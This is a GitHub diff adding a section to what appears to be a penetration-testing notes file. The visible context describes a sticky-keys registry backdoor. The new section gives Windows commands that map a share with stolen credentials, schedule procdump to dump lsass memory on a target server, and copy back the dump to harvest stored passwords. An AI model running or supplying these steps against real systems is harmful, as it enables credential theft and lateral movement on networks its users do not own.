File tree Expand file tree Collapse file tree 1 file changed +14
-0
lines changed Expand file tree Collapse file tree 1 file changed +14
-0
lines changed Original file line number Diff line number Diff line change @@ -171,3 +171,17 @@ This technique uses registry entries to switch the binary that the sticky keys e
171
171
* For the "Debugger" REG_SZ, make it have a value of your binary
172
172
173
173
* Press SHIFT 5 times and your binary should be executed
174
+
175
+ ### Process Dumping For Passwords
176
+ If you have access to a server and one of the user's usernames and passwords and can create shares on that computer,
177
+ you may be able to create a scheduled task which runs procdump.exe to dump all of the memory of the lsass process,
178
+ thus gaining access to all of the stored credentials on the targeted computer:
179
+
180
+ ```
181
+ net use \\target server /user:DOM\username password
182
+ copy procdump.exe \\targetserver\c$
183
+ copy procdump.bat \\targetserver\c$
184
+ procdump.exe -ma lsass creds.dump
185
+ at \\targetserver 13:37 C:\procdump.bat
186
+ copy \\targetserver\c$\targetserver.dmp .
187
+ ```
You can’t perform that action at this time.
0 commit comments